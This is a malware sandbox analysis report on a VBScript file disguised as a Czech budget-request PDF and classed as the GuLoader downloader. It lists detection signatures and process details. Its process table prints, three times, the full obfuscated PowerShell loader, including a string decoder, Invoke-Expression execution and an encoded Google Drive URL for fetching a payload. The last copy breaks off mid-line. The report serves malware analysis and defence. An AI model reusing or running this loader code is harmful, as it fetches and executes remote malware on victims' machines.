| File name: | ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs |
| Full analysis: | https://app.any.run/tasks/a84b4561-9fe9-4bf7-8ea2-69c66b83c99c |
| Verdict: | Malicious activity |
| Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
| Analysis date: | September 23, 2024, 14:30:47 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | FA21D757A727ACE9FAB8BA22E03F7DC5 |
| SHA1: | EDAA3726683853A70E8176F2368E3254192A9A11 |
| SHA256: | B8911AA1F56A7803220464354C15DBDCE5C70D0B66B03BD0ABA25C0155F2F161 |
| SSDEEP: | 384:3ccI8+xqQKYYKmlKCKQakPsZOqP1tVzFdk4GL283f48QihlTCEAZpdk/yKR:sc+AnjlKCKgE77V0z7lTCEAZIDR |
MALICIOUS
GULOADER has been detected
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
XORed URL has been found (YARA)
- wabmig.exe (PID: 1680)
SUSPICIOUS
Runs shell command (SCRIPT)
- wscript.exe (PID: 2204)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 2204)
- cmd.exe (PID: 6120)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
Converts a specified value to a byte (POWERSHELL)
- powershell.exe (PID: 6052)
Process drops legitimate windows executable
- wabmig.exe (PID: 1680)
Executable content was dropped or overwritten
- wabmig.exe (PID: 1680)
INFO
The process uses the downloaded file
- wscript.exe (PID: 2204)
Disables trace logs
- powershell.exe (PID: 6696)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
Checks proxy server information
- powershell.exe (PID: 6696)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
Converts byte array into ASCII string (POWERSHELL)
- powershell.exe (PID: 6696)
- powershell.exe (PID: 6052)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 6052)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
136
Monitored processes
9
Malicious processes
5
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1480 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1680 | "C:\Program Files (x86)\windows mail\wabmig.exe" | C:\Program Files (x86)\Windows Mail\wabmig.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) Contacts Import Tool Version: 10.0.19041.3636 (WinBuild.160101.0800) | |||||||||||||||
| 2204 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 2488 | "C:\Program Files (x86)\windows mail\wabmig.exe" | C:\Program Files (x86)\Windows Mail\wabmig.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) Contacts Import Tool Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) | |||||||||||||||
| 6052 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6120 | "C:\WINDOWS\system32\cmd.exe" /c ^"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6624 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6696 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT 